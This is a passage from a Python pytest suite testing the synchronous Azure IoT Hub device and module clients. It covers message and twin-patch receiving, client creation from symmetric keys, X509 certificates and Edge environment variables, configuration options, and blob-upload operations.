insertion_thread.start()
received_patch = client.receive_twin_desired_properties_patch(block=True)
assert received_patch is twin_patch_desired
# This proves that the blocking happens because 'received_patch' can't be
# 'twin_patch_desired' until after a 10 millisecond delay on the insert. But because the
# 'received_patch' IS 'twin_patch_desired', it means that client.receive_twin_desired_properties_patch
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no patches, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=False)
assert result is None
################
# DEVICE TESTS #
################
class IoTHubDeviceClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubDeviceClient
@pytest.fixture
def client(self, iothub_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubDeviceClient(iothub_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, iothub_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control fo a callback is required.
"""
return IoTHubDeviceClient(iothub_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, device_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return device_connection_string
@pytest.fixture
def sas_token_string(self, device_sas_token_string):
return device_sas_token_string
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - Instantiation")
class TestIoTHubDeviceClientInstantiation(
IoTHubDeviceClientTestsConfig, SharedClientInstantiationTests
):
@pytest.mark.it("Sets on_c2d_message_received handler in the IoTHubPipeline")
def test_sets_on_c2d_message_received_handler_in_pipeline(
self, client_class, iothub_pipeline, http_pipeline
):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline.on_c2d_message_received is not None
assert (
client._iothub_pipeline.on_c2d_message_received
== client._inbox_manager.route_c2d_message
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubDeviceClientCreateFromConnectionString(
IoTHubDeviceClientTestsConfig,
SharedClientCreateFromConnectionStringTests,
ConfigurationSharedClientCreateFromConnectionStringTests,
):
pass
@pytest.mark.describe(
"IoTHubDeviceClient (Synchronous) - .create_from_symmetric_key() -- Configuration"
)
class TestConfigurationIoTHubDeviceClientCreateFromSymmetricKey(IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Sets all configuration options to default when no user configuration provided")
def test_pipeline_configuration_defaults(
self,
mocker,
mock_pipeline_init,
client_class,
symmetric_key,
hostname_fixture,
device_id_fixture,
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key, hostname=hostname_fixture, device_id=device_id_fixture
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call()
assert mock_pipeline_init.call_args[0][1].blob_upload is True
assert mock_pipeline_init.call_args[0][1].method_invoke is False
assert mock_pipeline_init.call_args[0][1].websockets is False
assert mock_pipeline_init.call_args[0][1].product_info == ""
@pytest.mark.it("Sets all valid configuration options to the user supplied values")
@pytest.mark.parametrize(
"websockets, product_info",
[
pytest.param((None, None), (None, None), id=" Setting to None"),
pytest.param(
(True, True),
("__fake_product_info__", "__fake_product_info__"),
id=" Expected Values",
),
],
)
def test_pipeline_configuration(
self,
mocker,
mock_pipeline_init,
client_class,
symmetric_key,
hostname_fixture,
device_id_fixture,
websockets,
product_info,
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
kwargs = {"websockets": websockets[0], "product_info": product_info[0]}
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key,
hostname=hostname_fixture,
device_id=device_id_fixture,
**kwargs
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call(
websockets=websockets[0], product_info=product_info[0]
)
assert mock_pipeline_init.call_args[0][1].websockets == websockets[1]
assert mock_pipeline_init.call_args[0][1].product_info == product_info[1]
@pytest.mark.it("Throws if invalid configuration option is provided")
def test_pipeline_configuration_fails_with_bad_option(
self,
mocker,
mock_pipeline_init,
client_class,
symmetric_key,
hostname_fixture,
device_id_fixture,
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
kwargs = {"bad_option": "__fake_parameter__"}
with pytest.raises(TypeError):
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key,
hostname=hostname_fixture,
device_id=device_id_fixture,
**kwargs
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_symmetric_key()")
class TestIoTHubDeviceClientCreateFromSymmetricKey(IoTHubDeviceClientTestsConfig):
@pytest.mark.it(
"Uses the symmetric key and CA certificate combination to create a SymmetricKeyAuthenticationProvider"
)
def test_auth_provider_creation(
self, mocker, client_class, symmetric_key, hostname_fixture, device_id_fixture
):
mock_auth_init = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
)
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key, hostname=hostname_fixture, device_id=device_id_fixture
)
assert mock_auth_init.call_count == 1
assert mock_auth_init.call_args == mocker.call(
hostname=hostname_fixture,
device_id=device_id_fixture,
module_id=None,
shared_access_key=symmetric_key,
)
@pytest.mark.it("Uses the SymmetricKeyAuthenticationProvider to create an IoTHubPipeline")
def test_pipeline_creation(
self,
mocker,
client_class,
symmetric_key,
hostname_fixture,
device_id_fixture,
mock_pipeline_init,
):
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key, hostname=hostname_fixture, device_id=device_id_fixture
)
assert mock_pipeline_init.call_count == 1
assert mock_pipeline_init.call_args == mocker.call(mock_auth, mock_config_init.return_value)
@pytest.mark.it("Uses the IoTHubPipeline to instantiate the client")
def test_client_instantiation(
self, mocker, client_class, symmetric_key, hostname_fixture, device_id_fixture
):
mock_pipeline = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline").return_value
mock_pipeline_http = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
client_class.create_from_symmetric_key(
symmetric_key=symmetric_key, hostname=hostname_fixture, device_id=device_id_fixture
)
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(mocker.ANY, mock_pipeline, mock_pipeline_http)
@pytest.mark.it("Returns the instantiated client")
def test_returns_client(self, client_class, symmetric_key, hostname_fixture, device_id_fixture):
client = client_class.create_from_symmetric_key(
symmetric_key=symmetric_key, hostname=hostname_fixture, device_id=device_id_fixture
)
assert isinstance(client, client_class)
@pytest.mark.describe(
"IoTHubDeviceClient (Synchronous) - .create_from_x509_certificate() -- Configuration"
)
class TestConfigurationIoTHubDeviceClientCreateFromX509Certificate(IoTHubDeviceClientTestsConfig):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
@pytest.mark.it("Sets all configuration options to default when no user configuration provided")
def test_pipeline_configuration_defaults(self, mocker, mock_pipeline_init, client_class, x509):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call()
assert mock_pipeline_init.call_args[0][1].blob_upload is True
assert mock_pipeline_init.call_args[0][1].method_invoke is False
assert mock_pipeline_init.call_args[0][1].websockets is False
assert mock_pipeline_init.call_args[0][1].product_info == ""
@pytest.mark.it("Sets all valid configuration options to the user supplied values")
@pytest.mark.parametrize(
"websockets, product_info",
[
pytest.param((None, None), (None, None), id=" Setting to None"),
pytest.param(
(True, True),
("__fake_product_info__", "__fake_product_info__"),
id=" Expected Values",
),
],
)
def test_pipeline_configuration(
self, mocker, mock_pipeline_init, client_class, x509, websockets, product_info
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
kwargs = {"websockets": websockets[0], "product_info": product_info[0]}
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, **kwargs
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call(
websockets=websockets[0], product_info=product_info[0]
)
assert mock_pipeline_init.call_args[0][1].websockets == websockets[1]
assert mock_pipeline_init.call_args[0][1].product_info == product_info[1]
@pytest.mark.it("Throws if invalid configuration option is provided")
def test_pipeline_configuration_fails_with_bad_option(
self, mocker, mock_pipeline_init, client_class, x509
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
kwargs = {"bad_option": "__fake_parameter__"}
with pytest.raises(TypeError):
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, **kwargs
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubDeviceClientCreateFromX509Certificate(IoTHubDeviceClientTestsConfig):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
@pytest.mark.it("Uses the provided arguments to create a X509AuthenticationProvider")
def test_auth_provider_creation(self, mocker, client_class, x509):
mock_auth_init = mocker.patch("azure.iot.device.iothub.auth.X509AuthenticationProvider")
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert mock_auth_init.call_count == 1
assert mock_auth_init.call_args == mocker.call(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
@pytest.mark.it("Uses the X509AuthenticationProvider to create an IoTHubPipeline")
def test_pipeline_creation(self, mocker, client_class, x509, mock_pipeline_init):
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.X509AuthenticationProvider"
).return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert mock_pipeline_init.call_count == 1
assert mock_pipeline_init.call_args == mocker.call(mock_auth, mock_config_init.return_value)
@pytest.mark.it("Uses the IoTHubPipeline to instantiate the client")
def test_client_instantiation(self, mocker, client_class, x509):
mock_pipeline = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline").return_value
mock_pipeline_http = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(mocker.ANY, mock_pipeline, mock_pipeline_http)
@pytest.mark.it("Returns the instantiated client")
def test_returns_client(self, mocker, client_class, x509):
client = client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert isinstance(client, client_class)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .connect()")
class TestIoTHubDeviceClientConnect(IoTHubDeviceClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .disconnect()")
class TestIoTHubDeviceClientDisconnect(IoTHubDeviceClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - EVENT: Disconnect")
class TestIoTHubDeviceClientDisconnectEvent(
IoTHubDeviceClientTestsConfig, SharedClientDisconnectEventTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_message()")
class TestIoTHubDeviceClientSendD2CMessage(
IoTHubDeviceClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_message()")
class TestIoTHubDeviceClientReceiveC2DMessage(IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Implicitly enables C2D messaging feature if not already enabled")
def test_enables_c2d_messaging_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline
):
mocker.patch.object(SyncClientInbox, "get") # patch this so receive_message won't block
# Verify C2D Messaging enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = False # C2D will appear disabled
client.receive_message()
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.C2D_MSG
iothub_pipeline.enable_feature.reset_mock()
# Verify C2D Messaging not enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_message()
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the C2D inbox, if available")
def test_returns_message_from_c2d_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock
)
received_message = client.receive_message()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
c2d_inbox = client._inbox_manager.get_c2d_message_inbox()
assert c2d_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
c2d_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message(block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_message(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_message(block=False)
assert result is None
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_method_request()")
class TestIoTHubDeviceClientReceiveMethodRequest(
IoTHubDeviceClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_method_response()")
class TestIoTHubDeviceClientSendMethodResponse(
IoTHubDeviceClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_twin()")
class TestIoTHubDeviceClientGetTwin(IoTHubDeviceClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubDeviceClientPatchTwinReportedProperties(
IoTHubDeviceClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubDeviceClientReceiveTwinDesiredPropertiesPatch(
IoTHubDeviceClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_storage_info_for_blob()")
class TestIoTHubDeviceClientGetStorageInfo(WaitsForEventCompletion, IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Begins a 'get_storage_info_for_blob' HTTPPipeline operation")
def test_calls_pipeline_get_storage_info_for_blob(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
@pytest.mark.it(
"Waits for the completion of the 'get_storage_info_for_blob' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
fake_blob_name = "__fake_blob_name__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"storage_info": "__fake_storage_info__"},
)
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
@pytest.mark.it(
"Raises a client error if the `get_storage_info_for_blob` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
fake_blob_name = "__fake_blob_name__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns a storage_info object upon successful completion")
def test_returns_storage_info(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
fake_storage_info = "__fake_storage_info__"
received_storage_info = client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
assert (
received_storage_info is fake_storage_info
) # Note: the return value this is checkign for is defined in client_fixtures.py
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .notify_blob_upload_status()")
class TestIoTHubDeviceClientNotifyBlobUploadStatus(
WaitsForEventCompletion, IoTHubDeviceClientTestsConfig
):
@pytest.mark.it("Begins a 'notify_blob_upload_status' HTTPPipeline operation")
def test_calls_pipeline_notify_blob_upload_status(self, client, http_pipeline):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
client.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
kwargs = http_pipeline.notify_blob_upload_status.call_args[1]
assert http_pipeline.notify_blob_upload_status.call_count == 1
assert kwargs["correlation_id"] is correlation_id
assert kwargs["is_success"] is is_success
assert kwargs["status_code"] is status_code
assert kwargs["status_description"] is status_description
@pytest.mark.it(
"Waits for the completion of the 'notify_blob_upload_status' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
self.add_event_completion_checks(
mocker=mocker, pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status
)
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
@pytest.mark.it(
"Raises a client error if the `notify_blob_upload_status` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
assert e_info.value.__cause__ is my_pipeline_error
################
# MODULE TESTS #
################
class IoTHubModuleClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubModuleClient
@pytest.fixture
def client(self, iothub_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubModuleClient(iothub_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, iothub_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control fo a callback is required.
"""
return IoTHubModuleClient(iothub_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, module_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return module_connection_string
@pytest.fixture
def sas_token_string(self, module_sas_token_string):
return module_sas_token_string
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - Instantiation")
class TestIoTHubModuleClientInstantiation(
IoTHubModuleClientTestsConfig, SharedClientInstantiationTests
):
@pytest.mark.it("Sets on_input_message_received handler in the IoTHubPipeline")
def test_sets_on_input_message_received_handler_in_pipeline(
self, client_class, iothub_pipeline, http_pipeline
):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline.on_input_message_received is not None
assert (
client._iothub_pipeline.on_input_message_received
== client._inbox_manager.route_input_message
)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubModuleClientCreateFromConnectionString(
IoTHubModuleClientTestsConfig,
SharedClientCreateFromConnectionStringTests,
ConfigurationSharedClientCreateFromConnectionStringTests,
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Container Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnv(
IoTHubModuleClientTestsConfig
):
@pytest.mark.it(
"Uses Edge container environment variables to create an IoTEdgeAuthenticationProvider"
)
def test_auth_provider_creation(self, mocker, client_class, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment)
mock_auth_init = mocker.patch("azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider")
client_class.create_from_edge_environment()
assert mock_auth_init.call_count == 1
assert mock_auth_init.call_args == mocker.call(
hostname=edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"],
device_id=edge_container_environment["IOTEDGE_DEVICEID"],
module_id=edge_container_environment["IOTEDGE_MODULEID"],
gateway_hostname=edge_container_environment["IOTEDGE_GATEWAYHOSTNAME"],
module_generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
@pytest.mark.it(
"Ignores any Edge local debug environment variables that may be present, in favor of using Edge container variables"
)
def test_auth_provider_creation_hybrid_env(
self, mocker, client_class, edge_container_environment, edge_local_debug_environment
):
# This test verifies that with a hybrid environment, the auth provider will always be
# an IoTEdgeAuthenticationProvider, even if local debug variables are present
hybrid_environment = merge_dicts(edge_container_environment, edge_local_debug_environment)
mocker.patch.dict(os.environ, hybrid_environment)
mock_edge_auth_init = mocker.patch(
"azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider"
)
mock_sk_auth_parse = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse
client_class.create_from_edge_environment()
assert mock_edge_auth_init.call_count == 1
assert mock_sk_auth_parse.call_count == 0 # we did NOT use SK auth
assert mock_edge_auth_init.call_args == mocker.call(
hostname=edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"],
device_id=edge_container_environment["IOTEDGE_DEVICEID"],
module_id=edge_container_environment["IOTEDGE_MODULEID"],
gateway_hostname=edge_container_environment["IOTEDGE_GATEWAYHOSTNAME"],
module_generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
@pytest.mark.it(
"Uses the IoTEdgeAuthenticationProvider to create an IoTHubPipeline and an HTTPPipeline"
)
def test_pipeline_creation(self, mocker, client_class, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment)
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider"
).return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
mock_iothub_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline")
mock_http_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.HTTPPipeline")
client_class.create_from_edge_environment()
assert mock_iothub_pipeline_init.call_count == 1
assert mock_iothub_pipeline_init.call_args == mocker.call(
mock_auth, mock_config_init.return_value
)
assert mock_http_pipeline_init.call_count == 1
# This asserts without mock_config_init because currently edge isn't implemented. When it is, this should be identical to the line aboe.
assert mock_http_pipeline_init.call_args == mocker.call(
mock_auth, mock_config_init.return_value
)
@pytest.mark.it("Uses the IoTHubPipeline and the HTTPPipeline to instantiate the client")
def test_client_instantiation(self, mocker, client_class, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment)
# Always patch the IoTEdgeAuthenticationProvider to prevent I/O operations
mocker.patch("azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider")
mock_iothub_pipeline = mocker.patch(
"azure.iot.device.iothub.pipeline.IoTHubPipeline"
).return_value
mock_http_pipeline = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
client_class.create_from_edge_environment()
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(
mocker.ANY, mock_iothub_pipeline, mock_http_pipeline
)
@pytest.mark.it("Returns the instantiated client")
def test_returns_client(self, mocker, client_class, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment)
# Always patch the IoTEdgeAuthenticationProvider to prevent I/O operations
mocker.patch("azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider")
client = client_class.create_from_edge_environment()
assert isinstance(client, client_class)
@pytest.mark.it("Raises OSError if the environment is missing required variables")
@pytest.mark.parametrize(
"missing_env_var",
[
"IOTEDGE_MODULEID",
"IOTEDGE_DEVICEID",
"IOTEDGE_IOTHUBHOSTNAME",
"IOTEDGE_GATEWAYHOSTNAME",
"IOTEDGE_APIVERSION",
"IOTEDGE_MODULEGENERATIONID",
"IOTEDGE_WORKLOADURI",
],
)
def test_bad_environment(
self, mocker, client_class, edge_container_environment, missing_env_var
):
# Remove a variable from the fixture
del edge_container_environment[missing_env_var]
mocker.patch.dict(os.environ, edge_container_environment)
with pytest.raises(OSError):
client_class.create_from_edge_environment()
@pytest.mark.it("Raises OSError if there is an error using the Edge for authentication")
def test_bad_edge_auth(self, mocker, client_class, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment)
mock_auth = mocker.patch("azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider")
my_edge_error = IoTEdgeError()
mock_auth.side_effect = my_edge_error
with pytest.raises(OSError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is my_edge_error
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Local Debug Environment -- Configuration"
)
class TestConfigurationIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnv(
IoTHubModuleClientTestsConfig
):
@pytest.fixture
def mock_open(self, mocker):
return mocker.patch.object(io, "open")
@pytest.mark.it("Sets all configuration options to default when no user configuration provided")
def test_pipeline_configuration_defaults(
self, mocker, client_class, edge_local_debug_environment, mock_open
):
mocker.patch.dict(os.environ, edge_local_debug_environment)
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
mock_iothub_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline")
mocker.patch("azure.iot.device.iothub.pipeline.HTTPPipeline")
client_class.create_from_edge_environment()
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call()
assert mock_iothub_pipeline_init.call_args[0][1].blob_upload is False
assert mock_iothub_pipeline_init.call_args[0][1].method_invoke is True
assert mock_iothub_pipeline_init.call_args[0][1].websockets is False
assert mock_iothub_pipeline_init.call_args[0][1].product_info == ""
@pytest.mark.it("Sets all valid configuration options to the user supplied values")
@pytest.mark.parametrize(
"websockets, product_info",
[
pytest.param((None, None), (None, None), id=" Setting to None"),
